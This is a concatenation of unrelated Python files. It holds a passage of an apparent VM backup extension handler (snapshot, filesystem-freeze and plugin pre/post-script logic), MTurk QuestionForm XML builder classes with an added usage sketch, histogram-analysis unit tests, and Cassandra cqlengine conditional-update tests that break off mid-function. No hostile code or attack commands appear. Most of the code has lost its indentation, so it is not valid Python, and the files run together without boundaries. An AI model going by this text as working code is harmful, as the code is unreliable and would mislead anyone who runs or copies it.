hutil.update_settings_file()
if(bool(public_settings) == False and not protected_settings):
error_msg = "unable to load certificate"
hutil.SetExtErrorCode(ExtensionErrorCodeHelper.ExtensionErrorCodeEnum.FailedHandlerGuestAgentCertificateNotFound)
temp_result=CommonVariables.FailedHandlerGuestAgentCertificateNotFound
temp_status= 'error'
exit_with_commit_log(temp_status, temp_result,error_msg, para_parser)
if(para_parser.commandStartTimeUTCTicks is not None and para_parser.commandStartTimeUTCTicks != ""):
canTakeCrashConsistentSnapshot = can_take_crash_consistent_snapshot(para_parser)
temp_g_fsfreeze_on = True
freeze_snap_shotter = FreezeSnapshotter(backup_logger, hutil, freezer, temp_g_fsfreeze_on, para_parser, canTakeCrashConsistentSnapshot)
if freeze_snap_shotter.is_command_timedout(para_parser) :
error_msg = "CRP timeout limit has reached, will not take snapshot."
errMsg = error_msg
hutil.SetExtErrorCode(ExtensionErrorCodeHelper.ExtensionErrorCodeEnum.FailedGuestAgentInvokedCommandTooLate)
temp_result=CommonVariables.FailedGuestAgentInvokedCommandTooLate
temp_status= 'error'
exit_with_commit_log(temp_status, temp_result,error_msg, para_parser)
hutil.save_seq()
commandToExecute = para_parser.commandToExecute
        #validate all the required parameters here
backup_logger.log(commandToExecute,True)
if(CommonVariables.iaas_install_command in commandToExecute.lower()):
backup_logger.log('install succeed.',True)
run_status = 'success'
error_msg = 'Install Succeeded'
run_result = CommonVariables.success
backup_logger.log(error_msg)
elif(CommonVariables.iaas_vmbackup_command in commandToExecute.lower()):
if(para_parser.backup_metadata is None or para_parser.public_config_obj is None):
run_result = CommonVariables.error_parameter
hutil.SetExtErrorCode(ExtensionErrorCodeHelper.ExtensionErrorCodeEnum.error_parameter)
run_status = 'error'
error_msg = 'required field empty or not correct'
backup_logger.log(error_msg, True, 'Error')
else:
backup_logger.log('commandToExecute is ' + commandToExecute, True)
"""
make sure the log is not doing when the file system is freezed.
"""
temp_status= 'success'
temp_result=CommonVariables.ExtensionTempTerminalState
temp_msg='Transitioning state in extension'
blob_report_msg, file_report_msg = get_status_to_report(temp_status, temp_result, temp_msg, None)
status_report_to_file(file_report_msg)
status_report_to_blob(blob_report_msg)
#partial logging before freeze
if(para_parser is not None and para_parser.logsBlobUri is not None and para_parser.logsBlobUri != ""):
backup_logger.commit_to_blob(para_parser.logsBlobUri)
else:
backup_logger.log("the logs blob uri is not there, so do not upload log.")
backup_logger.log('commandToExecute is ' + commandToExecute, True)
workload_patch = WorkloadPatch.WorkloadPatch(backup_logger)
#new flow only if workload name is present in workload.conf
if workload_patch.name != None and workload_patch.name != "":
backup_logger.log("workload backup enabled for workload: " + workload_patch.name, True)
hutil.set_pre_post_enabled()
pre_skipped = False
if len(workload_patch.error_details) > 0:
backup_logger.log("skip pre and post")
pre_skipped = True
else:
workload_patch.pre()
if len(workload_patch.error_details) > 0:
backup_logger.log("file system consistent backup only")
#todo error handling
if len(workload_patch.error_details) > 0 and OnAppFailureDoFsFreeze == True: #App&FS consistency
g_fsfreeze_on = True
elif len(workload_patch.error_details) > 0 and OnAppFailureDoFsFreeze == False: # Do Fs freeze only if App success
hutil.SetExtErrorCode(ExtensionErrorCodeHelper.ExtensionErrorCodeEnum.error)
error_msg= 'Failing backup as OnAppFailureDoFsFreeze is set to false'
temp_result=CommonVariables.error
temp_status= 'error'
exit_with_commit_log(temp_status, temp_result,error_msg, para_parser)
elif len(workload_patch.error_details) == 0 and OnAppSuccessDoFsFreeze == False: # App only
g_fsfreeze_on = False
elif len(workload_patch.error_details) == 0 and OnAppSuccessDoFsFreeze == True: #App&FS consistency
g_fsfreeze_on = True
else:
g_fsfreeze_on = True
freeze_snapshot(thread_timeout)
if pre_skipped == False:
workload_patch.post()
workload_error = workload_patch.populateErrors()
if workload_error != None and g_fsfreeze_on == False:
run_status = 'error'
run_result = workload_error.errorCode
hutil.SetExtErrorCode(workload_error.errorCode)
error_msg = 'Workload Patch failed with error message: ' + workload_error.errorMsg
error_msg = error_msg + ExtensionErrorCodeHelper.ExtensionErrorCodeHelper.StatusCodeStringBuilder(hutil.ExtErrorCode)
backup_logger.log(error_msg, True)
elif workload_error != None and g_fsfreeze_on == True:
hutil.SetExtErrorCode(workload_error.errorCode)
error_msg = 'Workload Patch failed with warning message: ' + workload_error.errorMsg
error_msg = error_msg + ExtensionErrorCodeHelper.ExtensionErrorCodeHelper.StatusCodeStringBuilder(hutil.ExtErrorCode)
backup_logger.log(error_msg, True)
else:
if(run_status == CommonVariables.status_success):
run_status = 'success'
run_result = CommonVariables.success_appconsistent
hutil.SetExtErrorCode(ExtensionErrorCodeHelper.ExtensionErrorCodeEnum.success_appconsistent)
error_msg = 'Enable Succeeded with App Consistent Snapshot'
backup_logger.log(error_msg, True)
else:
error_msg = 'Enable failed in fsfreeze snapshot flow'
backup_logger.log(error_msg, True)
else:
PluginHostObj = PluginHost(logger=backup_logger)
PluginHostErrorCode,dobackup,g_fsfreeze_on = PluginHostObj.pre_check()
doFsConsistentbackup = False
appconsistentBackup = False
if not (PluginHostErrorCode == CommonVariables.FailedPrepostPluginhostConfigParsing or
PluginHostErrorCode == CommonVariables.FailedPrepostPluginConfigParsing or
PluginHostErrorCode == CommonVariables.FailedPrepostPluginhostConfigNotFound or
PluginHostErrorCode == CommonVariables.FailedPrepostPluginhostConfigPermissionError or
PluginHostErrorCode == CommonVariables.FailedPrepostPluginConfigNotFound):
                        backup_logger.log('App Consistent Backup Enabled', True)
HandlerUtil.HandlerUtility.add_to_telemetery_data("isPrePostEnabled", "true")
appconsistentBackup = True
if(PluginHostErrorCode != CommonVariables.PrePost_PluginStatus_Success):
backup_logger.log('Triggering File System Consistent Backup because of error code' + ExtensionErrorCodeHelper.ExtensionErrorCodeHelper.StatusCodeStringBuilder(PluginHostErrorCode), True)
doFsConsistentbackup = True
preResult = PluginHostResult()
postResult = PluginHostResult()
if not doFsConsistentbackup:
preResult = PluginHostObj.pre_script()
dobackup = preResult.continueBackup
if(g_fsfreeze_on == False and preResult.anyScriptFailed):
dobackup = False
if dobackup:
freeze_snapshot(thread_timeout)
if not doFsConsistentbackup:
postResult = PluginHostObj.post_script()
if not postResult.continueBackup:
dobackup = False
if(g_fsfreeze_on == False and postResult.anyScriptFailed):
dobackup = False
if not dobackup:
if run_result == CommonVariables.success and PluginHostErrorCode != CommonVariables.PrePost_PluginStatus_Success:
run_status = 'error'
run_result = PluginHostErrorCode
hutil.SetExtErrorCode(PluginHostErrorCode)
error_msg = 'Plugin Host Precheck Failed'
error_msg = error_msg + ExtensionErrorCodeHelper.ExtensionErrorCodeHelper.StatusCodeStringBuilder(hutil.ExtErrorCode)
backup_logger.log(error_msg, True)
if run_result == CommonVariables.success:
pre_plugin_errors = preResult.errors
for error in pre_plugin_errors:
if error.errorCode != CommonVariables.PrePost_PluginStatus_Success:
run_status = 'error'
run_result = error.errorCode
hutil.SetExtErrorCode(error.errorCode)
error_msg = 'PreScript failed for the plugin ' + error.pluginName
error_msg = error_msg + ExtensionErrorCodeHelper.ExtensionErrorCodeHelper.StatusCodeStringBuilder(hutil.ExtErrorCode)
backup_logger.log(error_msg, True)
break
if run_result == CommonVariables.success:
post_plugin_errors = postResult.errors
for error in post_plugin_errors:
if error.errorCode != CommonVariables.PrePost_PluginStatus_Success:
run_status = 'error'
run_result = error.errorCode
hutil.SetExtErrorCode(error.errorCode)
error_msg = 'PostScript failed for the plugin ' + error.pluginName
error_msg = error_msg + ExtensionErrorCodeHelper.ExtensionErrorCodeHelper.StatusCodeStringBuilder(hutil.ExtErrorCode)
backup_logger.log(error_msg, True)
break
if appconsistentBackup:
if(PluginHostErrorCode != CommonVariables.PrePost_PluginStatus_Success):
hutil.SetExtErrorCode(PluginHostErrorCode)
pre_plugin_errors = preResult.errors
for error in pre_plugin_errors:
if error.errorCode != CommonVariables.PrePost_PluginStatus_Success:
hutil.SetExtErrorCode(error.errorCode)
post_plugin_errors = postResult.errors
for error in post_plugin_errors:
if error.errorCode != CommonVariables.PrePost_PluginStatus_Success:
hutil.SetExtErrorCode(error.errorCode)
if run_result == CommonVariables.success and not doFsConsistentbackup and not (preResult.anyScriptFailed or postResult.anyScriptFailed):
run_status = 'success'
run_result = CommonVariables.success_appconsistent
hutil.SetExtErrorCode(ExtensionErrorCodeHelper.ExtensionErrorCodeEnum.success_appconsistent)
error_msg = 'Enable Succeeded with App Consistent Snapshot'
backup_logger.log(error_msg, True)
else:
run_status = 'error'
run_result = CommonVariables.error_parameter
hutil.SetExtErrorCode(ExtensionErrorCodeHelper.ExtensionErrorCodeEnum.error_parameter)
error_msg = 'command is not correct'
backup_logger.log(error_msg, True, 'Error')
except Exception as e:
hutil.update_settings_file()
errMsg = 'Failed to enable the extension with error: %s, stack trace: %s' % (str(e), traceback.format_exc())
backup_logger.log(errMsg, True, 'Error')
global_error_result = e
"""
    we do the final status report here to avoid the complex logic otherwise needed
    to handle logging while the file system is frozen.
"""
try:
if(global_error_result is not None):
if(hasattr(global_error_result,'errno') and global_error_result.errno == 2):
run_result = CommonVariables.error_12
hutil.SetExtErrorCode(ExtensionErrorCodeHelper.ExtensionErrorCodeEnum.error_12)
elif(para_parser is None):
run_result = CommonVariables.error_parameter
hutil.SetExtErrorCode(ExtensionErrorCodeHelper.ExtensionErrorCodeEnum.error_parameter)
else:
run_result = CommonVariables.error
hutil.SetExtErrorCode(ExtensionErrorCodeHelper.ExtensionErrorCodeEnum.error)
run_status = 'error'
error_msg += ('Enable failed.' + str(global_error_result))
status_report_msg = None
hutil.SetExtErrorCode(run_result) #setting extension errorcode at the end if missed somewhere
HandlerUtil.HandlerUtility.add_to_telemetery_data("extErrorCode", str(ExtensionErrorCodeHelper.ExtensionErrorCodeHelper.ExtensionErrorCodeNameDict[hutil.ExtErrorCode]))
total_used_size = -1
blob_report_msg, file_report_msg = get_status_to_report(run_status,run_result,error_msg, snapshot_info_array)
if(hutil.is_status_file_exists()):
status_report_to_file(file_report_msg)
status_report_to_blob(blob_report_msg)
except Exception as e:
errMsg = 'Failed to log status in extension'
backup_logger.log(errMsg, True, 'Error')
if(para_parser is not None and para_parser.logsBlobUri is not None and para_parser.logsBlobUri != ""):
backup_logger.commit(para_parser.logsBlobUri)
else:
backup_logger.log("the logs blob uri is not there, so do not upload log.")
backup_logger.commit_to_local()
sys.exit(0)
def uninstall():
global configSeqNo
hutil.do_parse_context('Uninstall', configSeqNo)
hutil.do_exit(0,'Uninstall','success','0', 'Uninstall succeeded')
def disable():
global configSeqNo
hutil.do_parse_context('Disable', configSeqNo)
hutil.do_exit(0,'Disable','success','0', 'Disable Succeeded')
def update():
global configSeqNo
    hutil.do_parse_context('Update', configSeqNo)
hutil.do_exit(0,'Update','success','0', 'Update Succeeded')
def enable():
global backup_logger,hutil,error_msg,para_parser,patch_class_name,orig_distro,configSeqNo
try:
hutil.do_parse_context('Enable', configSeqNo)
backup_logger.log('starting enable', True)
backup_logger.log("patch_class_name: "+str(patch_class_name)+" and orig_distro: "+str(orig_distro),True)
hutil.exit_if_same_seq()
hutil.save_seq()
protected_settings = hutil._context._config['runtimeSettings'][0]['handlerSettings'].get('protectedSettings', {})
public_settings = hutil._context._config['runtimeSettings'][0]['handlerSettings'].get('publicSettings')
para_parser = ParameterParser(protected_settings, public_settings, backup_logger)
if(para_parser.taskId is not None and para_parser.taskId != ""):
backup_logger.log('taskId: ' + str(para_parser.taskId), True)
randomSleepTime = random.randint(500, 5000)
backup_logger.log('Sleeping for milliseconds: ' + str(randomSleepTime), True)
time.sleep(randomSleepTime / 1000)
exit_if_same_taskId(para_parser.taskId)
taskIdentity = TaskIdentity()
taskIdentity.save_identity(para_parser.taskId)
temp_status= 'success'
temp_result=CommonVariables.ExtensionTempTerminalState
temp_msg='Transitioning state in extension'
blob_report_msg, file_report_msg = get_status_to_report(temp_status, temp_result, temp_msg, None)
status_report_to_file(file_report_msg)
start_daemon()
sys.exit(0)
except Exception as e:
hutil.update_settings_file()
errMsg = 'Failed to call the daemon with error: %s, stack trace: %s' % (str(e), traceback.format_exc())
global_error_result = e
temp_status= 'error'
temp_result=CommonVariables.error
hutil.SetExtErrorCode(ExtensionErrorCodeHelper.ExtensionErrorCodeEnum.error)
error_msg = 'Failed to call the daemon'
exit_with_commit_log(temp_status, temp_result,error_msg, para_parser)
def thread_for_log_upload():
global para_parser,backup_logger
backup_logger.commit(para_parser.logsBlobUri)
def start_daemon():
args = [os.path.join(os.getcwd(), "main/handle.sh"), "daemon"]
    #This process will start a new background process by calling
    # handle.py -daemon
    #to run the script and will exit itself immediately.
    #Redirect stdout and stderr to /dev/null. Otherwise the daemon process will
    #throw a broken pipe exception when the parent process exits.
devnull = open(os.devnull, 'w')
child = subprocess.Popen(args, stdout=devnull, stderr=devnull)
if __name__ == '__main__' :
main()
# Copyright (c) 2006,2007 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
class Question:
QUESTION_XML_TEMPLATE = """<Question><QuestionIdentifier>%s</QuestionIdentifier>%s%s</Question>"""
def __init__(self, identifier, content, answer_spec): #amount=0.0, currency_code='USD'):
self.identifier = identifier
self.content = content
self.answer_spec = answer_spec
def get_as_params(self, label='Question', identifier=None):
if identifier is None:
raise ValueError("identifier (QuestionIdentifier) is required per MTurk spec.")
return { label : self.get_as_xml() }
def get_as_xml(self):
ret = Question.QUESTION_XML_TEMPLATE % (self.identifier, self.content.get_as_xml(), self.answer_spec.get_as_xml())
return ret
class QuestionForm:
QUESTIONFORM_SCHEMA_LOCATION = "http://mechanicalturk.amazonaws.com/AWSMechanicalTurkDataSchemas/2005-10-01/QuestionForm.xsd"
QUESTIONFORM_XML_TEMPLATE = """<QuestionForm xmlns="%s">%s</QuestionForm>""" # % (ns, questions_xml)
def __init__(self, questions=None):
if questions is None or type(questions) is not list:
raise ValueError("Must pass a list of Question instances to QuestionForm constructor")
else:
self.questions = questions
def get_as_xml(self):
questions_xml = "".join([q.get_as_xml() for q in self.questions])
return QuestionForm.QUESTIONFORM_XML_TEMPLATE % (QuestionForm.QUESTIONFORM_SCHEMA_LOCATION, questions_xml)
#def startElement(self, name, attrs, connection):
# return None
#
#def endElement(self, name, value, connection):
#
# #if name == 'Amount':
# # self.amount = float(value)
# #elif name == 'CurrencyCode':
# # self.currency_code = value
# #elif name == 'FormattedPrice':
# # self.formatted_price = value
#
# pass # What's this method for? I don't get it.
class QuestionContent:
def __init__(self, title=None, text=None, bulleted_list=None, binary=None, application=None, formatted_content=None):
self.title = title
self.text = text
self.bulleted_list = bulleted_list
self.binary = binary
self.application = application
self.formatted_content = formatted_content
def get_title_xml(self):
if self.title is None:
return '' # empty
else:
return "<Title>%s</Title>" % self.title
def get_text_xml(self):
if self.text is None:
return ''
else:
return "<Text>%s</Text>" % self.text
def get_bulleted_list_xml(self):
if self.bulleted_list is None:
return ''
elif type(self.bulleted_list) is list:
return "<List>%s</List>" % self.get_bulleted_list_items_xml()
else:
raise ValueError("QuestionContent bulleted_list argument should be a list.")
def get_bulleted_list_items_xml(self):
ret = ""
for item in self.bulleted_list:
ret = ret + "<ListItem>%s</ListItem>" % item
return ret
def get_binary_xml(self):
if self.binary is None:
return ''
else:
raise NotImplementedError("Binary question content is not yet supported.")
def get_application_xml(self):
if self.application is None:
return ''
else:
raise NotImplementedError("Application question content is not yet supported.")
def get_formatted_content_xml(self):
if self.formatted_content is None:
return ''
else:
return "<FormattedContent><![CDATA[%s]]></FormattedContent>" % self.formatted_content
def get_as_xml(self):
children = self.get_title_xml() + self.get_text_xml() + self.get_bulleted_list_xml() + self.get_binary_xml() + self.get_application_xml() + self.get_formatted_content_xml()
return "<QuestionContent>%s</QuestionContent>" % children
class AnswerSpecification:
ANSWERSPECIFICATION_XML_TEMPLATE = """<AnswerSpecification>%s</AnswerSpecification>"""
def __init__(self, spec):
self.spec = spec
def get_as_xml(self):
values = () # TODO
return AnswerSpecification.ANSWERSPECIFICATION_XML_TEMPLATE % self.spec.get_as_xml()
class FreeTextAnswer:
FREETEXTANSWER_XML_TEMPLATE = """<FreeTextAnswer>%s%s</FreeTextAnswer>""" # (constraints, default)
FREETEXTANSWER_CONSTRAINTS_XML_TEMPLATE = """<Constraints>%s%s</Constraints>""" # (is_numeric_xml, length_xml)
FREETEXTANSWER_LENGTH_XML_TEMPLATE = """<Length %s %s />""" # (min_length_attr, max_length_attr)
FREETEXTANSWER_ISNUMERIC_XML_TEMPLATE = """<IsNumeric %s %s />""" # (min_value_attr, max_value_attr)
FREETEXTANSWER_DEFAULTTEXT_XML_TEMPLATE = """<DefaultText>%s</DefaultText>""" # (default)
def __init__(self, default=None, min_length=None, max_length=None, is_numeric=False, min_value=None, max_value=None):
self.default = default
self.min_length = min_length
self.max_length = max_length
self.is_numeric = is_numeric
self.min_value = min_value
self.max_value = max_value
def get_as_xml(self):
is_numeric_xml = ""
if self.is_numeric:
min_value_attr = ""
max_value_attr = ""
if self.min_value:
min_value_attr = """minValue="%d" """ % self.min_value
if self.max_value:
max_value_attr = """maxValue="%d" """ % self.max_value
is_numeric_xml = FreeTextAnswer.FREETEXTANSWER_ISNUMERIC_XML_TEMPLATE % (min_value_attr, max_value_attr)
length_xml = ""
if self.min_length or self.max_length:
min_length_attr = ""
max_length_attr = ""
            if self.min_length:
                min_length_attr = """minLength="%d" """ % self.min_length
            if self.max_length:
                max_length_attr = """maxLength="%d" """ % self.max_length
length_xml = FreeTextAnswer.FREETEXTANSWER_LENGTH_XML_TEMPLATE % (min_length_attr, max_length_attr)
constraints_xml = ""
if is_numeric_xml != "" or length_xml != "":
constraints_xml = FreeTextAnswer.FREETEXTANSWER_CONSTRAINTS_XML_TEMPLATE % (is_numeric_xml, length_xml)
default_xml = ""
if self.default is not None:
default_xml = FreeTextAnswer.FREETEXTANSWER_DEFAULTTEXT_XML_TEMPLATE % self.default
return FreeTextAnswer.FREETEXTANSWER_XML_TEMPLATE % (constraints_xml, default_xml)
class FileUploadAnswer:
FILEUPLOADANSWER_XML_TEMLPATE = """<FileUploadAnswer><MinFileSizeInBytes>%d</MinFileSizeInBytes><MaxFileSizeInBytes>%d</MaxFileSizeInBytes></FileUploadAnswer>""" # (min, max)
DEFAULT_MIN_SIZE = 1024 # 1K (completely arbitrary!)
DEFAULT_MAX_SIZE = 5 * 1024 * 1024 # 5MB (completely arbitrary!)
def __init__(self, min=None, max=None):
self.min = min
self.max = max
if self.min is None:
self.min = FileUploadAnswer.DEFAULT_MIN_SIZE
if self.max is None:
self.max = FileUploadAnswer.DEFAULT_MAX_SIZE
def get_as_xml(self):
return FileUploadAnswer.FILEUPLOADANSWER_XML_TEMLPATE % (self.min, self.max)
class SelectionAnswer:
"""
A class to generate SelectionAnswer XML data structures.
Does not yet implement Binary selection options.
"""
SELECTIONANSWER_XML_TEMPLATE = """<SelectionAnswer>%s<Selections>%s</Selections></SelectionAnswer>""" # % (style_xml, selections_xml)
SELECTION_XML_TEMPLATE = """<Selection><SelectionIdentifier>%s</SelectionIdentifier>%s</Selection>""" # (identifier, value_xml)
SELECTION_VALUE_XML_TEMPLATE = """<%s>%s</%s>""" # (type, value, type)
STYLE_XML_TEMPLATE = """<StyleSuggestion>%s</StyleSuggestion>""" # (style)
ACCEPTED_STYLES = ['radiobutton', 'dropdown', 'checkbox', 'list', 'combobox', 'multichooser']
def __init__(self, min=1, max=1, style=None, selections=None, type='text', other=False):
if style is not None:
if style in SelectionAnswer.ACCEPTED_STYLES:
self.style_suggestion = style
else:
raise ValueError("style '%s' not recognized; should be one of %s" % (style, ', '.join(SelectionAnswer.ACCEPTED_STYLES)))
else:
self.style_suggestion = None
if selections is None:
raise ValueError("SelectionAnswer.__init__(): selections must be a non-empty list of tuples")
else:
self.selections = selections
self.min_selections = min
self.max_selections = max
assert len(selections) >= self.min_selections, "# of selections is less than minimum of %d" % self.min_selections
#assert len(selections) <= self.max_selections, "# of selections exceeds maximum of %d" % self.max_selections
self.type = type
self.other = other
def get_as_xml(self):
xml = ""
if self.type == 'text':
TYPE_TAG = "Text"
elif self.type == 'binary':
TYPE_TAG = "Binary"
else:
raise ValueError("illegal type: %s; must be either 'text' or 'binary'" % str(self.type))
# build list of <Selection> elements
selections_xml = ""
for tpl in self.selections:
value_xml = SelectionAnswer.SELECTION_VALUE_XML_TEMPLATE % (TYPE_TAG, tpl[0], TYPE_TAG)
selection_xml = SelectionAnswer.SELECTION_XML_TEMPLATE % (tpl[1], value_xml)
selections_xml += selection_xml
if self.other:
# add <OtherSelection> element
selections_xml += "<OtherSelection />"
if self.style_suggestion is not None:
style_xml = SelectionAnswer.STYLE_XML_TEMPLATE % self.style_suggestion
else:
style_xml = ""
ret = SelectionAnswer.SELECTIONANSWER_XML_TEMPLATE % (style_xml, selections_xml)
# return XML
return ret
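# Illustrative usage sketch (not part of the original module): builds a small
# QuestionForm from the classes above and renders it to XML. All identifiers
# and values below are hypothetical examples.
def _example_question_form_xml():
    # A free-text question with a maximum answer length.
    colour_content = QuestionContent(title="Favourite colour",
                                     text="Please type your favourite colour.")
    colour_answer = AnswerSpecification(FreeTextAnswer(max_length=80))
    colour_question = Question(identifier="colour_1",
                               content=colour_content,
                               answer_spec=colour_answer)
    # A single-choice question rendered as radio buttons; each selection is a
    # (value, identifier) tuple.
    pick_content = QuestionContent(text="Pick one of the options below.")
    pick_answer = AnswerSpecification(
        SelectionAnswer(style='radiobutton',
                        selections=[('Red', 'opt_red'), ('Blue', 'opt_blue')]))
    pick_question = Question(identifier="pick_1",
                             content=pick_content,
                             answer_spec=pick_answer)
    form = QuestionForm(questions=[colour_question, pick_question])
    return form.get_as_xml()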
import numpy
from qualipy.utils.histogram_analyzation import *
def arrayNpEquals(arr1, arr2):
if arr1.shape[0] != arr2.shape[0]:
return False
comp = arr1 == arr2
for i in range(0, comp.shape[0]):
if comp[i] != True:
return False
return True
def arrayEquals(arr1, arr2):
if len(arr1) != len(arr2):
return False
comp = arr1 == arr2
if type(comp) == bool:
return comp
for i in range(0, len(comp)):
if comp[i] != True:
return False
return True
def test_remove_from_ends_with_valid_histogram():
hist = numpy.array([1, 1, 0, 0, 0, 1, 1])
assert len(remove_from_ends(hist).nonzero()[0]) == 0
def test_remove_from_ends_with_invalid_histogram():
hist = numpy.array([1.0])
assert arrayNpEquals(remove_from_ends(hist), hist)
def test_normalize_with_valid_histogram():
hist = numpy.array([1, 2, 3, 2, 1])
assert numpy.absolute(numpy.sum(normalize(hist)) - 1.0) < 0.00000001
def test_normalize_with_invalid_histogram():
hist = numpy.array([])
assert arrayNpEquals(normalize(hist), hist)
def test_calculate_continuous_distribution_with_valid_histogram():
hist = numpy.array([1.0, 2.0, 3.0, 4.0])
assert arrayNpEquals(calculate_continuous_distribution(hist),
numpy.array([1.0, 3.0, 6.0, 10.0]))
def test_continuous_distribution_with_invalid_histogram():
hist = numpy.array([])
assert arrayNpEquals(calculate_continuous_distribution(hist), hist)
def test_largest_with_valid_histogram():
hist = numpy.array([2.0, 4.0, 1.0, 3.0])
assert arrayNpEquals(largest(hist, 0.5), numpy.array([4.0, 3.0]))
def test_largest_with_invalid_histogram():
hist = numpy.array([])
assert arrayNpEquals(largest(hist, 0.5), numpy.array([]))
def test_calculate_derivatives_with_valid_histogram():
hist = numpy.array([1, 2, 4, 2, 1])
assert arrayNpEquals(calculate_derivatives(hist),
numpy.array([1.0, 2.0, -2.0, -1.0]))
def test_calculate_derivatives_with_invalid_histogram():
hist = numpy.array([])
assert arrayNpEquals(calculate_derivatives(hist), numpy.array([]))
def test_calculate_local_min_values_with_valid_histogram():
hist = numpy.array([2.0, 1.0, 2.0, 4.0, 3.0, 2.0, 3.0])
assert calculate_local_min_values(hist, 2) == \
[LocationData(1, 1.0), LocationData(5, 2.0)]
def test_calculate_local_min_values_with_invalid_histogram():
hist = numpy.array([])
assert arrayEquals(calculate_local_min_values(hist, 2), [])
def test_calculate_local_max_values_with_valid_histogram():
hist = numpy.array([2.0, 1.0, 2.0, 4.0, 3.0, 2.0, 3.0])
assert calculate_local_max_values(hist) == [LocationData(3, 4.0)]
def test_calculate_local_max_values_with_invalid_histogram():
hist = numpy.array([])
assert arrayEquals(calculate_local_max_values(hist, 2), [])
def test_calculate_local_minimums_with_valid_histogram():
hist = numpy.array([2.0, 1.0, 2.0, 4.0, 3.0, 2.0, 3.0])
mins = calculate_local_minimums(hist)
assert len(mins) == 2
assert mins[0].index == 1 and mins[0].value == 1.0
assert mins[1].index == 5 and mins[1].value == 2.0
def test_calculate_local_minimums_with_invalid_histogram():
hist = numpy.array([])
assert arrayEquals(calculate_local_minimums(hist), [])
def test_calculate_local_maximums_with_valid_histogram():
hist = numpy.array([2.0, 1.0, 2.0, 4.0, 3.0, 2.0, 3.0])
maxs = calculate_local_maximums(hist)
assert len(maxs) == 1
assert maxs[0].index == 3 and maxs[0].value == 4.0
def test_calculate_local_maximums_with_invalid_histogram():
hist = numpy.array([])
assert arrayEquals(calculate_local_maximums(hist), [])
def test_calc_mean_with_valid_histogram():
hist = numpy.array([1.0, 2.0, 3.0, 2.0, 1.0])
assert calc_mean(hist) == 3.0
def test_calc_mean_with_invalid_histogram():
hist = numpy.array([])
hist_2 = numpy.array([1.0, -1.0])
assert calc_mean(hist) == 0.0
assert calc_mean(hist_2) == 0.0
def test_variance_with_valid_histogram():
hist = numpy.array([1.0, 2.0, 3.0, 2.0, 3.0])
mean = calc_mean(hist)
assert numpy.absolute(calc_variance(hist, mean) - 2.686) < 0.01
def test_variance_with_invalid_histogram():
hist = numpy.array([])
hist_2 = numpy.array([1.0, -1.0])
mean = calc_mean(hist)
mean_2 = calc_mean(hist_2)
assert calc_variance(hist, mean) == 0.0
assert calc_variance(hist_2, mean_2) == 0.0
def test_standard_deviation_with_valid_histogram():
hist = numpy.array([1.0, 2.0, 3.0, 2.0, 3.0])
assert numpy.absolute(calc_standard_deviation(hist) - 1.639) < 0.01
def test_standard_deviation_with_invalid_histogram():
hist = numpy.array([])
hist_2 = numpy.array([1.0, -1.0])
assert calc_standard_deviation(hist) == 0.0
assert calc_standard_deviation(hist_2) == 0.0
def test_roughness_with_valid_histogram():
hist = numpy.array([0.0, 0.5, 1.0, 0.5, 2.0, 0.5, 0.0])
assert calculate_roughness(hist) == 2.0
def test_roughness_with_empty_histogram():
hist = numpy.array([])
assert calculate_roughness(hist) == 0.0
def test_calculate_peak_value_with_valid_histogram():
hist = numpy.array([0.0, 0.5, 1.0, 0.5, 2.0, 0.5, 0.0, 2.0])
assert arrayNpEquals(calculate_peak_value(hist),
numpy.array([-1.0]).astype(numpy.float32))
def test_calculate_peak_value_with_invalid_histogram():
hist = numpy.array([])
assert arrayNpEquals(calculate_peak_value(hist), numpy.array([]))
# Copyright 2013-2016 DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
import unittest2 as unittest
except ImportError:
import unittest # noqa
import mock
import six
from uuid import uuid4
from cassandra.cqlengine import columns
from cassandra.cqlengine.management import sync_table, drop_table
from cassandra.cqlengine.models import Model
from cassandra.cqlengine.query import BatchQuery, LWTException
from cassandra.cqlengine.statements import ConditionalClause
from tests.integration.cqlengine.base import BaseCassEngTestCase
from tests.integration import CASSANDRA_VERSION, greaterthancass20
class TestConditionalModel(Model):
id = columns.UUID(primary_key=True, default=uuid4)
count = columns.Integer()
text = columns.Text(required=False)
@unittest.skipUnless(CASSANDRA_VERSION >= '2.0.0', "conditionals only supported on cassandra 2.0 or higher")
class TestConditional(BaseCassEngTestCase):
@classmethod
def setUpClass(cls):
super(TestConditional, cls).setUpClass()
sync_table(TestConditionalModel)
@classmethod
def tearDownClass(cls):
super(TestConditional, cls).tearDownClass()
drop_table(TestConditionalModel)
def test_update_using_conditional(self):
t = TestConditionalModel.create(text='blah blah')
t.text = 'new blah'
with mock.patch.object(self.session, 'execute') as m:
t.iff(text='blah blah').save()
args = m.call_args
self.assertIn('IF "text" = %(0)s', args[0][0].query_string)
def test_update_conditional_success(self):
t = TestConditionalModel.create(text='blah blah', count=5)
id = t.id
t.text = 'new blah'
t.iff(text='blah blah').save()
updated = TestConditionalModel.objects(id=id).first()
self.assertEqual(updated.count, 5)
self.assertEqual(updated.text, 'new blah')
def test_update_failure(self):
t = TestConditionalModel.create(text='blah blah')
t.text = 'new blah'
t = t.iff(text='something wrong')
with self.assertRaises(LWTException) as assertion:
t.save()
self.assertEqual(assertion.exception.existing, {
'text': 'blah blah',
'[applied]': False,
})
def test_blind_update(self):
t = TestConditionalModel.create(text='blah blah')
